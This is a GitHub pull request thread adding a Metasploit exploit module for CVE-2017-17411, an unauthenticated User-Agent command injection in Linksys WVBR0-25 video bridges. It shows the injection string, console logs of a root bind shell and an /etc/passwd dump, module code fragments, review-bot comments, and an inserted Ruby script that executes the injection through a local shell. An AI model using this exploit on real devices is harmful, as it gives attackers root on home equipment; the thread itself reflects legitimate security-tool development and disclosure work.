Adds exploit module for CVE-2017-17411 #9336
Conversation
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect
  wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command
  injection in version < 1.0.41 of the web management portal via the
  User-Agent header. Authentication is not required to exploit this
  vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
Adds exploit module for CVE-2017-17411
| 'method' => 'GET', | ||
| 'uri' => '/' | ||
| }) | ||
| if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/ # version < 1.0.41 |
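Review bot: the hand-written version regex in `res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/` is hard to audit and depends on a fourth version component being present (a bare `1.0.40` would not match the `40\.` branch), so it is easy to get wrong as new builds appear. Consider extracting the version with something like `/Firmware Version:\s*([\d.]+)/` and comparing it as a version, e.g. `Gem::Version.new($1) < Gem::Version.new('1.0.41')`, which expresses the "< 1.0.41" condition from the description directly.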
False positives can occur here. Let's set up a simple HTTP server for it:

```
$ cat index.html
Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05 Product.type: production Linux: Linux version 2.6.30 (root@build-vm) (gcc version 4.2.1 (ARC_2.3)) #1 Tue Aug 26 10:47:37 PDT 2014 Board: titans
$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```

Try to check the vulnerability status as follows:

```
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options

Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RPORT 8080
RPORT => 8080
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > check
[+] 127.0.0.1:8080 The target is vulnerable.
```
Hmm...that is true, but then again I can't think of a way to check this that can't also be faked in the same way...
I think @nixawk is suggesting a more unique string to fingerprint?
Also, it should return CheckCode::Appears if it's just a version check.
Oh that’s an idea. If I have it echo back a random string at runtime, then it wouldn’t be possible to predict the response. I’ll do that instead.
Yeah, that's the kind of check that would warrant CheckCode::Vulnerable. You even do it below with cmd/unix/generic. :)
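The following Ruby script is an added example, not the module's code or anything the PR author posted. It models two things discussed on this page: the flow from the PR description (fetch the banner, decide by firmware version, then inject through the User-Agent with `";<payload> #`) and the point of this review thread, that a banner can be served by anything (the reviewer's `python -m http.server` with a pasted `index.html`), so only a command whose output the scanner cannot predict proves execution. Assumptions not taken from the page: the shell template the device splices the User-Agent into (`echo "UA" | md5sum` stands in for the real, unshown command), the constructed banner and responses, and the symbols `:vulnerable`/`:appears`/`:safe`/`:unknown` standing in for `Msf::Exploit::CheckCode`. It runs the spliced line through the local `/bin/sh` to show the injection for real, so it needs `sh` and `md5sum` on the host.

```ruby
# Added example: models the WVBR0-25 check and User-Agent injection described
# in the PR. Not the Metasploit module's code. Requires /bin/sh and md5sum.
require 'digest'
require 'open3'
require 'securerandom'

# Fixed version stated on the page: anything below 1.0.41 is vulnerable.
FIXED_VERSION = Gem::Version.new('1.0.41')

# Constructed input: banner format copied from the reviewer's index.html.
BANNER = 'Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 ' \
         'Firmware Builddate: 2014-08-26 18:05 Product.type: production'

# ASSUMPTION: the device splices the raw User-Agent into a double-quoted
# argument of a shell command whose output goes through md5sum. The real
# command on the WVBR0-25 is not shown on the page; this stands in for it.
VULNERABLE_TEMPLATE = 'echo "UA" | md5sum'

# Pull the version out of the banner and compare it as a version rather than
# with a hand-written digit regex, so 1.0.4, 1.0.40 and 1.0.41.x all order
# correctly against the fixed release.
def firmware_version(body)
  m = body.to_s.match(/Firmware Version:\s*(\d+(?:\.\d+)+)/)
  m && Gem::Version.new(m[1])
end

def vulnerable_version?(body)
  v = firmware_version(body)
  !v.nil? && v < FIXED_VERSION
end

# Exploit form from the PR description: close the quote, run the payload,
# comment out whatever the device appends after the User-Agent.
def exploit_agent(cmd)
  "\"; #{cmd} #"
end

# Check form from the reviewed diff: close the quote, start printf and let
# the device's own closing quote terminate the token. The token is hex so
# printf never sees a % or backslash it would interpret.
def check_agent(token)
  "\"; printf \"#{token}"
end

# What the device's shell actually receives for a given User-Agent.
def rendered_shell_line(agent, template = VULNERABLE_TEMPLATE)
  template.sub('UA') { agent }
end

# Simulated vulnerable device: runs the spliced line in a real shell and
# returns the banner followed by the command output.
def vulnerable_device(agent)
  out, _status = Open3.capture2('sh', '-c', rendered_shell_line(agent))
  "#{BANNER}\n#{out}"
end

# Simulated spoof server (the reviewer's python -m http.server): returns the
# banner verbatim no matter what User-Agent is sent.
def static_server(_agent)
  BANNER
end

# Check ordering from the review: proof of execution first, banner second.
def check(server, token: SecureRandom.hex(8))
  body = server.call(check_agent(token))
  # Only a host that actually ran `printf "<token>" | md5sum` can produce this
  # digest; a server that merely reflects the User-Agent still fails here.
  return :vulnerable if body.include?(Digest::MD5.hexdigest(token))
  return :appears if vulnerable_version?(body)
  return :safe if firmware_version(body)
  :unknown
end

if $PROGRAM_NAME == __FILE__
  puts rendered_shell_line(exploit_agent('id'))
  puts "spoof server: #{check(method(:static_server))}"
  puts "real device:  #{check(method(:vulnerable_device))}"
end
```

The spoof server yields `:appears` (banner matched, nothing executed) while the simulated device yields `:vulnerable`, and a banner reporting 1.0.41 or later yields `:safe` rather than falling through to `:unknown`. Printing `rendered_shell_line(exploit_agent('id'))` shows why the trailing `#` matters: the line becomes `echo ""; id #" | md5sum`, with the device's own closing quote and pipe turned into a comment.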
| return Exploit::CheckCode::Unknown | ||
| end | ||
|
|
||
| puts res.body.to_s |
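Review bot: `return Exploit::CheckCode::Unknown` is also where a genuine WVBR0-25 banner reporting 1.0.41 or later ends up if the only other branch is the vulnerable-version match above; returning `CheckCode::Safe` when the banner is recognised but the version is not below 1.0.41, and reserving `Unknown` for responses that are not a WVBR0-25 page at all, makes `check` reliable for both outcomes. The `puts res.body.to_s` that follows it writes the full response to stdout outside the module's `print_*`/`vprint_*` plumbing and should be dropped.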
- `puts` is not recommended; `vprint_*` / `print_*` can be used.
- If the status is vulnerable, we should not output the HTTP response directly in the check function.
Gah! This was a debug message from my testing. Will remove it.
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| require 'msf/core' |
Please remove require 'msf/core'.
Oh ok, removing.
| [ | ||
| ['CVE', '2017-17411'], | ||
| ['ZDI', '17-973'], | ||
| ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair'] |
This was a good read. Didn't realize it was you, @headlesszeke!
| ## | ||
|
|
||
| class MetasploitModule < Msf::Exploit::Remote | ||
| Rank = NormalRanking |
Command injection that might be ExcellentRanking.
heh, well if you say so ;)
| 'method' => 'GET', | ||
| 'uri' => '/', | ||
| 'headers' => { | ||
| 'User-Agent' => "\"; printf \"#{check_str}" |
You can use the top-level key agent instead of setting it in headers manually.
will do
| res = send_request_raw({ | ||
| 'method' => 'GET', | ||
| 'uri' => '/', | ||
| 'agent' => "\"; printf \"#{check_str}" |
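Review bot: `printf` treats `%` and backslash sequences in its first argument as format directives, and the value in `'agent' => "\"; printf \"#{check_str}"` also lands inside the device's double-quoted string where `"`, `$`, backtick and backslash are interpreted, so `check_str` must be generated from a character set that contains none of these, e.g. `Rex::Text.rand_text_alphanumeric`; otherwise the echoed value will not match what the module compares against and a vulnerable device is reported as not vulnerable.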
`echo "string"` == `printf "string\n"`.
- echo may be more stable.
I thought printf was the more reliable of the two. I used it so I wouldn’t have to deal with any newlines being fed to the md5sum along with the string, but I can change it if desired.
Since this is a device and not Joe Bob's random PHP app, and you have the device, you can check. It's probably BusyBox. If it has both, use either.
Oh yeah, it definitely has both. I think I’m just gonna leave it as is for simplicity.
I'm happy to handle this instead of just shepherding it if @headlesszeke is willing to test. :) If you could add some quick docs as per https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation, that'd be fantastic. You can find examples under

Sorry for the delay over the holiday, doc file added (hopefully up to the usual standards)
| @@ -0,0 +1,49 @@ | |||
| ## Vulnerable Application | |||
|
|
|||
| This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/). | |||
The link doesn't link to anything specifically, and I don't see Linksys or WVBR0-25 on the page. Can we find a better link?
Yeah, I kinda figured this question would come up. That page has a link to the wvbr0's manual under the wireless video bridge section and is the closest thing to a vendor product page I can find. I didn't link directly to the manual itself because it seemed in poor form to link to a pdf from metasploit. ;)
As I see it, there are two other options if we don't want that: I can either link to a 3rd party site that has a better description for the device but is not official (like https://www.solidsignal.com/pview.asp?p=wvb for example) or remove the link altogether...
The page is fine I think if you were to say something like "(under the title foobar)" directing to where it was. I think adding an "unofficial" link is also a stellar idea. This way since either may change we have at least a base reference to go off of
| 2. Start msfconsole. | ||
| 3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth``` | ||
| 4. Do: ```set payload cmd/unix/bind_netcat``` | ||
| 5. Do: ```set RHOST <ip>``` |
change to square brackets
Will do.
Docs look pretty good, 2 minor nit picks, but over all nice

Can you do one last test, @headlesszeke? I'll ship it after.

Just tested the module again for fun after making the doc changes. Everything still working beautifully. Thanks for the help!

Release Notes

This new exploit module can achieve RCE on Linksys WVBR0-25 (wireless video bridge) devices running certain versions of firmware.